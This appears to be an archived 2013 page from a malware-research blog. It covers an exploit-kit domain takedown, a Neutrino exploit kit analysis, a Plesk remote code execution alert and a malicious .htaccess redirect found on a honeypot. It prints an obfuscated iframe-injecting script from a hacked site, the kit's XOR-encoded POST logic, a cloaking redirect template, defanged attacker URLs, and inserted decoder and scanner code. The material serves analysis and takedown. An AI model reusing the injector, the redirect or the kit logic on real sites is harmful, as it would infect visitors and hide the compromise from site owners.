Saturday, June 29, 2013

Suspension announcement of 61 unique domains used by Blackhole Exploit Kit ("closest" type) Crime Group operated on 80.78.247.114 (Russia)

MalwareMustDie, NPO, during its research activities, treats the suspension of malicious domains as an important milestone in the fight against malware, and also publicly releases some of the suspended domains under "Operation Tango Down" [What is TangoDown?] as a public announcement.

The current report documents a fast and successful suspension process, the result of good coordination between the members who spotted, analyzed and reported the threat, our PiCs in the Tango Team (thanks to @S and @CL for the hard work) and the related registrars, who gave us GREAT cooperation in following up swiftly and in banning further registrations by this actor (blacklist). We achieved a much better pace in the suspension process (less than 18 hours), even right before the weekend, which serves as a good lead-time reference for future cases.

Following is the detailed report. Note that it is not aimed at analysis details (we already have many analyses of similar cases on this blog) but is intended as cybercrime evidence; all of the material posted is to be used in the subsequent legal process.

Verdict of Crime

We detected a very dangerous exploit kit landing page, infecting victims with malware through browser vulnerability exploitation, pointing to the IP/network below:

"80.78.247.114 / AS43146 Agava Ltd. (Russian Federation)"
It was initially caught in the act using the "/closest/" version of the Blackhole Exploit Kit, operated under the URLs below:
"h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php
h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php
h00p://detectedflights.org/closest/i9jfuhioejskveohnuojfir.php
h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php
h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php
h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php
 :"
Furthermore, the activity is also recorded in the VirusTotal pDNS report:
URL: https://www.virustotal.com/en/ip-address/80.78.247.114/information/
It was also monitored in URLQuery:
URL: http://urlquery.net/search.php?q=80.78.247.114&type=string&start=2013-05-01&end=2013-06-29&max=400

Exploit Attack Evidence

Some snapshots of the exploit infector used:

The evidence is recorded in the URLQuery reports below:

"http://urlquery.net/report.php?id=3356618
http://urlquery.net/report.php?id=3356579
http://urlquery.net/report.php?id=3355901
http://urlquery.net/report.php?id=3352167
http://urlquery.net/report.php?id=3332078
  :"

Tango Information

Dismantling detail: although 150+ domains registered under various conditions by the same bad actor behind this scheme were spotted, we sorted them down to the 61 unique domains listed below, which will be enough to put the related infection off the internet. Sorting proceeded by eliminating duplicate records, sub-domains, and domains not clearly related or not in the verdict. These domains were confirmed down by June 28th, 2013, 23:59 GMT+9. The individual ID/credentials used by the registrant have been marked and distributed to all registrars as a blacklist to block further threats, and also passed to the regional authority for the further legal process.

The suspended malware-related domains are listed below:


Public announcement by #MalwareMustDie NPO. All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

Monday, June 24, 2013

Knockin' on Neutrino Exploit Kit's door.. (where is "that" PluginDetect 0.8.0 ??)

Summary of infection chains

This is going to be a long write-up, but the weekdays have started, and so has the daily work, which comes first under #MalwareMustDie, NPO rules, so please allow me to split this post into two parts; this is the important part..

I found this EK in the course of an infection; the URI reference, landing page and malicious obfuscated code used show Neutrino Exploit Kit traces, but there are slight changes compared with previous findings posted by fellow researchers here and there, so maybe it's a different or newer variant.

By the time I spotted this, it was a fresh, growing threat that had started to build infection chains. I can't just sit and watch, nor just play with it, so as a quick act to stop it (which is a must) I dared to write a malicious-verdict post for shutdown reference purposes. Please help push this threat's shutdown ASAP; don't wait for the research's pace (thanks in advance).

First, let's get straight to the summary of the infection in the table below.
PS: Believe me, all of the information below is worth blocking the threat over, and NO! this is never a good/legitimate mechanism; it must be a malicious scheme, so don't waste your time wondering: grab the sample we grabbed (attached) and see it for yourself (quicker).

EK Function           IP Address       URL
Redirector            74.53.108.147    h00p://www.webapps4hotels.com/?wps=2
TDS/Clicker           81.88.48.79      h00p://bizkaikopirenaika.com/clicker.php
Landing Page          178.17.169.199   h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
PluginDetect File     178.17.169.199   h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js
Payload/Infector URL  178.17.169.199   h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371

Neutrino EK is up at 178.17.169.199 in Moldova, Europe, and serves the infector under multiple random domains as per below (we are requesting the shutdown of these malicious acts at this moment), partially based on shared DNS services:

1. xxx.dnsdojo.com

2. xxx.selfip.biz

3. xxx.worse-than.tv

4. xxx.does-it.net

The TDS service used is at IP 81.88.48.79 in Italy, which is also a shared dynamic-DNS domain/service, as below:

onlinux-es.setupdns.net
This involves a huge number of possible domains as malware infectors; the list is -->>[HERE]

Additionally, the redirector used shared domains spotted at IP 74.53.108.147 in Houston, Texas, on ISP/domain theplanet.com:

acaville.com.pe
fridgeadvisor.com
thetreadmilladvisor.com
webapps4hotels.com
  :

Neutrino EK's Landing / Infection Analysis

It started from the redirection URL, delivered via spam, which leads to the redirector URL.
In the browser it looks like this:

The download log..

--2013-06-24 19:00:11--  h00p://www.webapps4hotels.com/?wps=2
Resolving www.webapps4hotels.com... seconds 0.00, 74.53.108.147
Caching www.webapps4hotels.com => 74.53.108.147
Connecting to www.webapps4hotels.com|74.53.108.147|:80... seconds 0.00, connected.
  :"
GET /?wps=2 HTTP/1.0
Host: www.webapps4hotels.com
HTTP request sent, awaiting response...
 ":
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2013 10:00:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: h00p://www.webapps4hotels.com/xmlrpc.php
Set-Cookie: PHPSESSID=79a8dc9b2b759b5e987a266ce9991b74; path=/
Set-Cookie: nosqueeze=nosqueeze; expires=Mon, 17-Jun-2013 10:00:03 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
200 OK
  :
Length: unspecified [text/html]
Saving to: `index.html'
2013-06-24 19:00:13 (109 KB/s) - `index.html' saved [56700]
You'll see the malicious code right away in the snipped jinxed code:
<body class="home blog single-author two-column right-sidebar">

                                                               
    <script type="text/javascript" language="javascript" >
                                                                
                    bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;
ff=String.fromCharCode;z="dy";try{document["bo"+z]++}catch(d21vd12
v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval
"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,1
                  [...]
1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];
for(i=2-2;-i+1314!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]
))+0xa-bv);}za=e;za(s)}</script><div id="page" class="hfeed">
 <header id="branding" role="banner">
The code explains itself as follows..

These variables are the key to rotate the values...

 sp="spli"+"t";
 w=window;
 ff=String.fromCharCode;
 z="dy";

..and then it writes the body...

 try
 {
   document["bo"+z]++
 }

..and after it runs, the eval burped...

   try
   {
     document;
   }
   catch(wb)
   {
     vzs=2;
   }
   if(!vzs)e=w["eval"];
      :

The burped eval value is a hidden IFRAMER with a specific cookie condition:
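The arithmetic of that decoder loop, re-implemented as an added example (not code from this post or from the kit) so the comma-separated array can be decoded offline without running the script's eval. The two input strings are the fragments visible in the snippet above; the part the post elides with "[...]" is not known, so only the head and tail are decoded.

```javascript
// Added example: offline decoder for the Blackhole "closest" injected script.
// Constants the obfuscated script builds at run time:
//   bv=(5-3-1)  -> 1          aq="0"+"x" -> "0x"
//   (0x19==031) -> 25==25, always true (031 is octal), so the guard is a no-op
const BV = 5 - 3 - 1;

// Each comma-separated token is a hex number; the loop body computes
//   String.fromCharCode(eval("0x" + token) + 0xa - bv)
// i.e. every character is stored as (charCode - 9) written in hex.
function decodeClosest(encoded) {
  let out = "";
  for (const tok of encoded.split(",")) {
    if (tok === "") continue;             // tolerate a trailing comma
    const value = parseInt(tok, 16);      // same result as eval("0x" + tok)
    if (Number.isNaN(value)) {
      throw new Error(`not a hex token: "${tok}"`);
    }
    out += String.fromCharCode(value + 0xa - BV);
  }
  return out;
}

// Inverse transform, handy for confirming a decoding against a captured sample.
function encodeClosest(plain) {
  return Array.from(plain, ch => (ch.charCodeAt(0) - (0xa - BV)).toString(16)).join(",");
}

// Fragments copied from the injected <script> shown above: the start of the
// array and its tail (the leading lone "1" after the elision is dropped because
// it may be a token cut in half by the "[...]").
const HEAD = "17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20";
const TAIL = "71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1";

// Index guard from the original: for(i=0; -i+1314!=0; i++) walks exactly
// 1314 tokens, so a full capture of this build must have that many.
const EXPECTED_TOKENS = 1314;

function decodeFragments() {
  return { head: decodeClosest(HEAD), tail: decodeClosest(TAIL) };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(decodeFragments()));
}
```

The head decodes to the opening of a function declaration and the tail to its closing braces, which is the shape of the hidden iframer the post refers to.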

This is why I got the TDS URL, which I checked as follows:

// TDS trolls...

--2013-06-24 19:31:14--  "h00p://bizkaikopirenaika.com/clicker.php"
Resolving bizkaikopirenaika.com... seconds 0.00, 81.88.48.79
Caching bizkaikopirenaika.com => 81.88.48.79
Connecting to bizkaikopirenaika.com|81.88.48.79|:80... seconds 0.00, connected.
  :"
GET /clicker.php HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
Host: bizkaikopirenaika.com
HTTP request sent, awaiting response...
 ":"
HTTP/1.1 302 Found"
Date: Mon, 24 Jun 2013 10:31:07 GMT
Server: Apache/2.2.14 (Unix)
X-Powered-By: PHP/5.2.5
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Content-Length: 0
Content-Type: text/html
Content-Language: es
Keep-Alive: timeout=2, max=90
Connection: Keep-Alive
  :"
302 Found"
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371 [following]
Skipping 0 bytes of body: [] done.
--2013-06-24 19:31:18--  h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Resolving youbljtwmqfpggrest.dnsdojo.net... seconds 0.00, 178.17.169.199
Caching youbljtwmqfpggrest.dnsdojo.net => 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... seconds 0.00, connected.
  :
GET /afscm?qomseteng=7559371 HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: youbljtwmqfpggrest.dnsdojo.net:8000
Connection: keep-alive
Keep-Alive: 300
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jun 2013 10:31:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.6
  :
200 OK
Length: unspecified [text/html]
Saving to: `afscm@qomseteng=7559371'
2013-06-24 19:31:22 (34.0 MB/s) - `afscm@qomseteng=7559371' saved [2512]
Well, we got the 302 that threw us to the URL below: "the" landing page.
h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
It downloads the code below for us:

If we beautify the JavaScript part, which is the core of this infection and the main verdict of the malicious act, you'll recognize it as part of the plugin-detect code that detects the plugins and other components of your browser, for exploitation purposes:

For your reference, I beautified the full code of the landing page here -->>[MMD Pastebin]
As you can see in the code, unlike previous Neutrino EK landing code, it doesn't plainly mention the "host-id" or "password" used; instead they are now hidden and generated via the logic below:
 JSON.stringify=JSON.stringify||function(a)
 {
   var c=typeof a;
   if("object"!=c||null===a)return"string"==c&&(a='"'+a+'"'),String(a);
   var d,b,e=[],f=a&&a.constructor==Array;
   for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
 return(f?"[":"{")+String(e)+(f?"]":"}")};

Back to the downloaded code (the Neutrino EK's landing page): it has so many links to .js and .css files; don't waste your time on this garbage (yes, I checked them all), i.e. the .js files are below:

// below are the .js files..
wgyesrof.js
vuofg.js
cqqv.js
cnvpce.js
aqrwwpb.js
hptkkoyqvzt.js
ppkuryqha.js
blgxhwyvdop.js
zenpzmilbxv.js
oumvvhkwsruznt.js
rhkggotwoffagc.js
...yup, to be sure I downloaded them all..
--2013-06-24 19:46:20--  h00p://youbljtwmqfpggrest.dnsdojo.net:8000/.js
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/javascript]
Saving to: `wgyesrof.js'
2013-06-24 19:46:23 (923 KB/s) - `wgyesrof.js' saved [118]
Saving to: `vuofg.js'
2013-06-24 19:46:51 (6.50 MB/s) - `vuofg.js' saved [181]
Saving to: `cqqv.js'
2013-06-24 19:47:06 (5.96 MB/s) - `cqqv.js' saved [178]
Saving to: `cnvpce.js'
2013-06-24 19:47:23 (866 KB/s) - `cnvpce.js' saved [29]
Saving to: `aqrwwpb.js'
2013-06-24 19:47:41 (677 KB/s) - `aqrwwpb.js' saved [24]
Saving to: `hptkkoyqvzt.js'
2013-06-24 19:47:58 (4.85 MB/s) - `hptkkoyqvzt.js' saved [182]
Saving to: `ppkuryqha.js'
2013-06-24 19:49:07 (1.83 MB/s) - `ppkuryqha.js' saved [107]
Saving to: `blgxhwyvdop.js'
2013-06-24 19:49:27 (360 KB/s) - `blgxhwyvdop.js' saved [10]
Saving to: `zenpzmilbxv.js'
2013-06-24 19:49:47 (4.85 MB/s) - `zenpzmilbxv.js' saved [135]
Saving to: `oumvvhkwsruznt.js'
2013-06-24 19:50:12 (154 KB/s) - `oumvvhkwsruznt.js' saved [21]
Saving to: `rhkggotwoffagc.js'
2013-06-24 19:50:32 (1.18 MB/s) - `rhkggotwoffagc.js' saved [37]
They contain crap strings...
// cat & merge them all and result is here: 100% pure craps..

The same goes for all the .css files..
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/rcijxziqjmwai.css
ejuzjwuujkemwakngquwbriiviazztb
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/ubjabj.css
ylyvjo
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/wqhbu.css
vhrmzrnkvxkvpnnjsrhegmuvxuipgv
   : 
$ peekl h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/pqnojry.css
sxsstxnzjbjt

The PluginDetect 0.8.0

According to the plugin-detection code above in the landing page, there MUST BE! a PluginDetect somewhere. Eager to know which version they use, I checked and found one more .JS worth checking, camouflaged under the /script/ directory. So let's fetch it:

--2013-06-24 20:02:06--  
"h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js"
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41616 (41K) [application/x-javascript]
Saving to: `plg.js'
2013-06-24 20:02:12 (42.4 KB/s) - `plg.js' saved [41616/41616]
A snippet:
var PluginDetect={version:"0.8.0",name:"PluginDetect",openTag:...
RegExp(b):this.getNumRegx).exec(a):null;return c?c[0]:null},compar...
"0","0","0"]);for(c=0;4>c;c++)if(/^(0+)(.+)$/.test(d[c])&&(d[c]=Re...
this.$;return a.isIE&&7<=a.verIE?1:0},objectProperty:function(a){v...
!c.test(f))return d[e];return null},getMimeEnabledPlugin:function(...
if(!b||!b.getVersion)return c;c.plugin=b;this.isDefined(b.installe...
g&&f>g&&"0"!=d[f]||e[f]!=d[f]&&(-1==g&&(g=f),"0"!=d[f]))return b;r...
b,c=document,d=a.userAgent||"",e=a.vendor||"",f=a.platform||"",a=a....
c.getElementsByTagName("body")[0]||c.body||null;this.verIE=(this.i...
"")?5:b)||this.verIE;this.verIE=b||this.docModeIE}this.ActiveXEnab...
this.formatNum(RegExp.$1):null;this.verSafari=(this.isSafari=(/App...
this.isArray(a)&&0<a.length&&this.isFunc(a[0]))&&b.push(a)},callAr...
"0");1!=f.getVersionDone&&(f.getVersion(c,d,e),null===f.getVersion...
   :
The beautified code is pasted here--->>[MMD Pastebin]

Below is the list of software this PluginDetect detects and could (maliciously) weaponize against:

"Quicktime
Java
Flash
Shockwave
Windows Media Player
Silver Light
VideoLAN VLC
Adobe Reader
Real Player
"
Meaning, exploitation of the above list of software is applicable.

The Neutrino EK's PluginDetect does not contain direct infection code; all of the infection code is tied to the applet in its landing pages, so unlike Blackhole EK or Cool EK, it is no surprise to find Neutrino EK's PluginDetect script undetected by virus scanning products:

URL: https://www.virustotal.com/en/file/4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1/analysis/
SHA256: 4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1
SHA1:  6c15ef7801f35733e89e8df0113866d8a09a5ba6
MD5:  13f62e2903683ec97a25885b05e8bed9
File size:      40.6 KB ( 41616 bytes )
File name:      plg.js
File type:      Text
Tags:           text
Detection ratio: 0 / 47
Analysis date:  2013-06-24 16:19:36 UTC ( 10 hours, 39 minutes ago ) 

Malicious Exploit Kit Verdict

The supporting verdict proving that this landing page is an EK's landing (Neutrino):

1. Attempt to xor and decode the URL:

$.post(d,f,function(a)
{$("body").append(xor(decodeURIComponent(a),c))
2. Neutrino EK's infector string building logic (to be used by post query later on):
 for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
 return(f?"[":"{")+String(e)+(f?"]":"}")
3. The XOR logic itself..
function xor(a,c)
 { for(var d="",b=0,e=0,b=0;b<a.length;b++)e=Math.floor(b%c.length),d+=String.fromCharCode(a.charCodeAt(b)^c.charCodeAt(e));
   return d }
4. Below are the Java exploit infection traces via POST request recorded (still being checked; the target keeps changing too..):
Query:   POST /bxfkxhcqk HTTP/1.1
host:    h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000
Referer: h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371
This query above was generated by the logic/code below in the landing page:
[...]
   var f={};
   f[b]=c;
   f[e]=encodeURIComponent(xor(JSON.stringify(a),c));
   $.post(d,f,function(a) {$("body").append(xor(decodeURIComponent(a),c))}
    [...]
5. The camouflage attempt to download PluginDetect 0.8.0
6. The attempt to hide XOR key in var aa, bb, cc
$(document).ready(function()
{ var aa = 'gvwuhd';
  var bb = '';
  var cc = aa;
  bb = cc;
to be stored in var bb and passed in the function's parameters below:
\u0410\u041d602(
  '51c81ff4aaa2cce42c1809bd',
   bb,
   'bxfkxhcqk',  // <-- this string "params d" goes to the post.. MMD note. 
   'rruqytkegrvjt',
   'eefazbuhfeekpb'   );
For further use in the XOR-related calls/function as the "c" parameter:
function \u0410\u041d602(a,c,d,b,e)
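The XOR/JSON/POST pipeline from items 1 to 6 above, assembled as an added example (not the post's or the kit's own code) so that a POST body or response captured in a PCAP can be decoded offline once the key is known. The xor routine is transcribed from the landing-page snippet; the key is the page's var aa; the wrapper names and the plugin record are constructed here.

```javascript
// Added example: decode Neutrino EK landing-page traffic from a capture.

// Transcribed from the landing page: repeating-key XOR, key index cycled by b % c.length.
function xor(a, c) {
  let d = "";
  for (let b = 0; b < a.length; b++) {
    const e = Math.floor(b % c.length);
    d += String.fromCharCode(a.charCodeAt(b) ^ c.charCodeAt(e));
  }
  return d;
}

// What the landing page does before $.post (snippet 4 above):
//   f[e] = encodeURIComponent(xor(JSON.stringify(a), c))
function buildPostValue(pluginInfo, key) {
  return encodeURIComponent(xor(JSON.stringify(pluginInfo), key));
}

// Analyst's inverse: XOR with the same key undoes itself, so the recorded
// form value decodes back to the JSON the victim's browser sent.
function decodePostValue(formValue, key) {
  return JSON.parse(xor(decodeURIComponent(formValue), key));
}

// The server reply is handled the same way by the page:
//   $("body").append(xor(decodeURIComponent(a), c))
// so a captured response body decodes with one call.
function decodeResponse(body, key) {
  return xor(decodeURIComponent(body), key);
}

// Key taken from the landing page's var aa; the plugin record is constructed
// to resemble the PluginDetect result the page serialises (not a real capture).
const KEY = "gvwuhd";
const SAMPLE_PLUGIN_INFO = { java: "1.7.0.17", flash: "11.7.700.202" };

function roundTrip() {
  const wire = buildPostValue(SAMPLE_PLUGIN_INFO, KEY);
  return { wire, decoded: decodePostValue(wire, KEY) };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(roundTrip()));
}
```

With a real capture, the key is the literal assigned to aa in the landing page and the form value is the field the page names in its "params d" call.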

To be continued..
(plan: to break down the PluginDetect code, payload details and further infection-spreading details in more depth.. if the EK still exists later on..)


Additional

A couple of URLQuery results for this part of the story---> [1] and [2]
And the VirusTotal infection check result (pDNS) for the Exploit Kit's IP is here-->>[Virus Total]

Samples and PCAP data are shared for raising the detection ratio and for research purposes only:

Download here--->>[MMD Dumps]

Reference

Our friend "Malware Forensic" (link) wrote good analyses of the previous version of Neutrino:
(click the number inside the bracket for links)
[-1-] Neutrino Exploit Kit landing page demystified
[-2-] Neutrino Exploit Kit Landing pane change or variation
[-3-] Neutrino Exploit Kit analysis

The great Exploit Kit researcher @kafeine (link) posted on Neutrino EK:
[-1-] Hello Neutrino ! (just one more Exploit Kit)
[-2-] CVE-2013-2423 integrating Exploit Kits (Neutrino EK Parts)
[-3-] His tweet on changes spotted in this Exploit Kit:

Update Information

1. Since the shutdown was faster than grabbing the overall EK data, I am sorry, there is no Part 2 for this post.
2. Our friend found a new landing page; we decoded it here-->>[MMD Pastebin]

#MalwareMustDie!

Friday, June 7, 2013

MMD-0000-2013 - Malware Infection Alert on Plesk/Apache Remote Code Execution zeroday vulnerability

Summary:

This zero-day PoC (thanks to KingCope for announcing the zero-day, a great share!) is having a huge impact at the worst possible time in malware web-infection trends, as a botnet spread via file injection is already ITW and spotted (salute to RepoCERT), so we found it necessary to quickly post the vulnerability clarification here (via @unixfreaxjp), together with a short memo about this threat, in order to mitigate the infection vector.

The vulnerability is a remote flaw previously seen in PHP's CGI Remote Code Execution of Arbitrary Code, CVE-2012-1823 (here's the CVE's info link), which can also be used to trigger a remote file upload; it can be executed remotely by direct request (ok, to cut the crap: I mean the exploitation PoC code via a POST command) without using a PHP file as the interpreter. This is currently a severe zero-day flaw that has to be fixed by the Plesk panels (the PoC's affected/tested versions are 8.6, 9.0, 9.2, 9.3 and 9.5.4, and the unaffected version is 11.0.9) in the way they configure the web server with ScriptAlias /phppath/ "/usr/bin/".

To be noted: the malware spotted so far, as reported by RepoCERT, are IRC bot variants mostly of script-kiddie level that have DDoS functionality, with comment traces written in Portuguese inside. It is only a matter of time before more serious malware web-infection bases (like redirectors/backdoors) utilize this flaw to spread their malware infection links/URLs, either via exploit kits or directly, so to all of us: please be aware and patch your Plesk panel's version.

As mitigation, we advise implementing a custom rule to block unnecessary direct connections via/through IRC ports to remote hosts from the affected hosts (Note: not affected web servers, nor domains, but hosts). For checking and cleaning purposes RepoCERT is sharing their cleaning and removal script tools here and here.

Malware functionality detected of current spotted samples

Identification of the attacker via IRC channel:

DoS functionality:

Backdoor-1 File send to remote host via IRC:

Backdoor-2 Encoded notification of affected host:

PoC leaked in news links:

The IT news about this zero-day spread widely before Plesk patched the flaw, and many of the news items include pastes of the exploit PoC that can be used to attack the affected Plesk panels; please be aware of this too. The links are as follows:

[1] Ars Technica: More than 360,000 Apache websites imperiled by critical Plesk vulnerability (Updated)
[2] Heise Security: Angeblicher Zero-Day-Exploit für Plesk
[3] WebWereld: Exploit pakt Apache via vers gat in Plesk-beheerpanel
[4] PCWorld: Hacker publishes alleged zero-day exploit for older Plesk versions
[5] Parity News: Hacker publishes alleged zero-day exploit for Plesk
[6] H-Online: Supposed zero-day exploit for Plesk - Update

#MalwareMustDie!

Wednesday, June 5, 2013

A mystery of Malware URL "cnt.php" Redirection Method with Apache's mod_rewrite.c's RewriteCond in .htaccess

Summary

To be honest, since knowing that most of the Linux malware are blocking my IP and my country's access, I changed my strategy to invite and trap them with the honeypot method on a dummy server, to let them come and attack. (I think) I was preparing it well.. but after some time without anything happening I was thinking this strategy wasn't working well AAND...! Today my swatch script poked me with an email for having a visitor. Checking the site, I found it was actually visited two times, but it looks like I did not get an alert for the first one because I forgot to activate swatch in cron :-(

Code Injection in web contents and .htaccess

In short, this visitor is not friendly: he changed the root's index pages and the fake JavaScript files into ones with the obfuscated injected code as per below:

With we can decode it easily into this:

It is redirection code using a special condition on cookies. The cookie will determine the conditions to trigger a prepared action in the redirection destination's PHP page (which at this moment only God knows what it is).

Moving along.. Seeing the decoded code result reminded me of the recent Darkleech poking script in their injected sites. So, with a grateful feeling to this visitor, I was seeking further and I found the .htaccess with the below code:

At this time I feel sad to face the fact that this is only a common hacking method (honestly, I expected cooler stuff like the latest Darkleech or RedKit or maybe cDorked..sigh!) of using mod_rewrite.c for the site's redirection. mod_rewrite is an Apache module that allows the seamless (to the client) redirection of files, reference -->>[APACHE.ORG]. Here mod_rewrite.c's RewriteEngine, which is turned off in most Apache web servers' default setting, was switched ON, and RewriteCond commands were added to build the condition that redirects HTTP requests matching the pipe-delimited keywords to the specific file/site/URL mentioned above.

This "incident" is actually using a common usage of mod_rewrite.c by most webapp programmers: redirecting all GET requests to index.php if the requested file or directory does not exist, with the format below:

<IfModule mod_rewrite.c>
   RewriteEngine On
   RewriteBase /
   RewriteRule ^index\.php$ - [L]
   RewriteCond %{REQUEST_FILENAME} !-f
   RewriteCond %{REQUEST_FILENAME} !-d
   RewriteRule . /index.php [L]
</IfModule>  
Hacker moronz are mostly using mod_rewrite.c with the below format for evil redirection:
   RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing|keyword-etc1|keyword-etc2) [OR]
   RewriteCond %{HTTP_REFERER} (google|yahoo|bing|keyword-etc1|keyword-etc2)
   RewriteCond %{REQUEST_URI} /$ [OR]
   RewriteCond %{REQUEST_FILENAME} (html|htm|php|cgi|)$ [NC]
   RewriteCond %{REQUEST_FILENAME} !FILENAME-TO-HANDLE-REQUEST.(php|cgi)
   RewriteCond FILENAME-TO-HANDLE-REQUEST.(php|cgi) -f
   RewriteRule ^.*$ /FILENAME-TO-HANDLE-REQUEST.(php|cgi) [L]
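
The difference between the two .htaccess shapes above (the front-controller rewrite and the evil redirect) can be checked mechanically when you are looking at many sites. The following is an added example of mine, not tooling from the post: it parses RewriteCond/RewriteRule lines and flags a rule whose conditions test HTTP_REFERER or HTTP_USER_AGENT for search-engine names and whose pattern sends every request to a single script. The two .htaccess contents are constructed; "redir.php" is a made-up handler name standing in for FILENAME-TO-HANDLE-REQUEST.

```python
import re

# Constructed .htaccess contents. The first is the usual front-controller
# rewrite shown above; the second follows the evil template above with
# "redir.php" as a made-up handler name.
BENIGN_HTACCESS = r"""
<IfModule mod_rewrite.c>
   RewriteEngine On
   RewriteBase /
   RewriteRule ^index\.php$ - [L]
   RewriteCond %{REQUEST_FILENAME} !-f
   RewriteCond %{REQUEST_FILENAME} !-d
   RewriteRule . /index.php [L]
</IfModule>
"""

INJECTED_HTACCESS = r"""
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php|cgi|)$ [NC]
RewriteCond %{REQUEST_FILENAME} !redir\.php
RewriteCond redir.php -f
RewriteRule ^.*$ /redir.php [L]
"""

SEARCH_ENGINE_RE = re.compile(r"google|yahoo|bing|msn|ask", re.I)
CLOAK_VARS = {"%{HTTP_USER_AGENT}", "%{HTTP_REFERER}"}
CATCH_ALL_PATTERNS = {".", ".*", "^.*$", "(.*)", "^(.*)$"}
SCRIPT_TARGET_RE = re.compile(r"\.(php|cgi|pl)$", re.I)

def scan_htaccess(text):
    """Flag RewriteRule blocks whose conditions look at where the visitor came
    from (referer/user agent naming a search engine) and whose rule routes
    every request into one script: the redirect shape described in the post."""
    findings, conds = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts:
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))
        elif directive == "rewriterule" and len(parts) >= 3:
            pattern, target = parts[1], parts[2]
            cloaking = [p for v, p in conds
                        if v.upper() in CLOAK_VARS and SEARCH_ENGINE_RE.search(p)]
            if cloaking and pattern in CATCH_ALL_PATTERNS and SCRIPT_TARGET_RE.search(target):
                findings.append({"line": lineno, "target": target, "conditions": cloaking})
            conds = []   # RewriteCond lines only govern the next RewriteRule
    return findings

if __name__ == "__main__":
    print("benign  :", scan_htaccess(BENIGN_HTACCESS))
    print("injected:", scan_htaccess(INJECTED_HTACCESS))
```

The benign WordPress-style block also uses a catch-all pattern, but its conditions only test whether the requested file exists, so it is not reported; the scanner keys on the referer/user-agent cloaking, which is what makes the redirect invisible to the site owner who types the URL directly.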

Attack Source IP

The log shows the IP access source of the attacker:

   71.89.72.41
   83.138.146.85
   82.98.131.102
   117.26.78.57
The GeoIP shows these location:

FTP logs of the attack - An Automation Trace

All of the access by this moronz visitor went through FTP, as the event log below shows. These traces are the clue to a systematic hacking of a web server, which suggests the use/involvement of tools/scripts:

// EVENT #1:

